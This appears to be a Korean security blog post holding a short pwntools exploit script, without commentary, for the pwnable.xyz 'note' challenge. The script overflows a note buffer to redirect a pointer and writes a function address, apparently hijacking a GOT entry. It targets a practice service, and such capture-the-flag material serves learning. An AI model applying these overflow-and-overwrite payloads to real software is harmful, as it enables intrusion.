History view
Exploit
from pwn import * import time context.log_level = 'debug' p = remote("svc.pwnable.xyz",30016) #p = process('./note') #gdb.attach(p,''' #break *0x0000000000400a10 #continue #''') p.recvuntil("> ") p.sendline("1") p.recvuntil("Note len? ") p.sendline("38") p.recvuntil("note: ") payload = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x20\x12\x60\x00" p.sendline(payload) p.recvuntil("> ") p.sendline("2") p.recvuntil("desc: ") p.sendline("\x3c\x09\x40\x00\x00\x00\x00\x00") p.recvuntil("> ") p.sendline("12") p.recvall() p.close()
'Pwning in Linux' 카테고리의 다른 글
Writeup - echo1 (0) | 2019.03.01 |
---|---|
Exploit - Two targets pwnable.xyz (0) | 2019.03.01 |
Exploit - Misalignment pwnable.xyz (0) | 2019.03.01 |
Exploit - GrownUp pwnable.xyz (0) | 2019.03.01 |
Trigger return NULL value in Malloc (0) | 2019.02.28 |
Comments
Notice
Recent Posts
Recent Comments
- Total
- Today
- Yesterday
Link
TAG
- write primitive
- GOT Dereferencing/Overwriting
- XSS
- Windows
- 32Bit
- Backdoors
- leak libc
- leak stack memory address
- cracking
- format string
- ASM
- canary
- fake stack frame
- buffer overflow
- Pwnable.kr
- stack pivot
- arithmetic overflow/underflow
- use after free
- pwnable.tw
- x64dbg
- theFaunia course
- Call oriented programming
- pwnable.xyz
- dnspy
- open-redirect
- hijacking redirection flow
- shellcode
- one gadget
- return oriented programming
- html injection
일 | 월 | 화 | 수 | 목 | 금 | 토 |
---|---|---|---|---|---|---|
1 | 2 | 3 | 4 | 5 | 6 | |
7 | 8 | 9 | 10 | 11 | 12 | 13 |
14 | 15 | 16 | 17 | 18 | 19 | 20 |
21 | 22 | 23 | 24 | 25 | 26 | 27 |
28 | 29 | 30 |
Archives